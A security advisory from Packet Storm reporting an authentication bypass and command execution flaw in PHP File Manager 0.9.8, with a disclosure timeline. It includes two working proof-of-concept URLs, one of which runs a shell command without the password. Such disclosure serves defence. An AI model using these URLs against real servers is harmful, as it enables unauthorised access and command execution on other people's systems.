PHP File Manager 0.9.8 Authentication Bypass / Code Execution

2016-01-26T00:00:00
ID PACKETSTORM:135384
Type packetstorm
Reporter Imre Rad
Modified 2016-01-26T00:00:00

Description

                                        
                                            `PHP File Manager 0.9.8 (http://phpfm.sourceforge.net/) is vulnerable  
to authentication bypass due to insecure implementation of register  
globals emulation. An attacker is able to override the blockKeys array  
and thus build a valid session and access all the protected  
functionality (including execution of shell commands) without actual  
knowledge of the password set.  
  
PoC URLs:  
  
http://host/phpfm.php?blockKeys[]=&fm_self=FOOO&loggedon=d41d8cd98f00b204e9800998ecf8427e&action=5  
http://host/phpfm.php?blockKeys[]=&fm_self=FOOO&loggedon=d41d8cd98f00b204e9800998ecf8427e&action=6&cmd=ls%20-la  
  
  
Timeline:  
2016-01-04: Original report to the developer  
2016-01-04: CVE ID requested from MITRE  
2016-01-11: Report resent to the developer  
2016-01-18: Notification sent to the developer about disclosing the  
vulnerability on 25th of January  
2016-01-18: Disclosure  
  
  
Imre Rad  
Search-Lab Ltd.  
http://www.search-lab.hu/  
http://www.scademy.com/  
`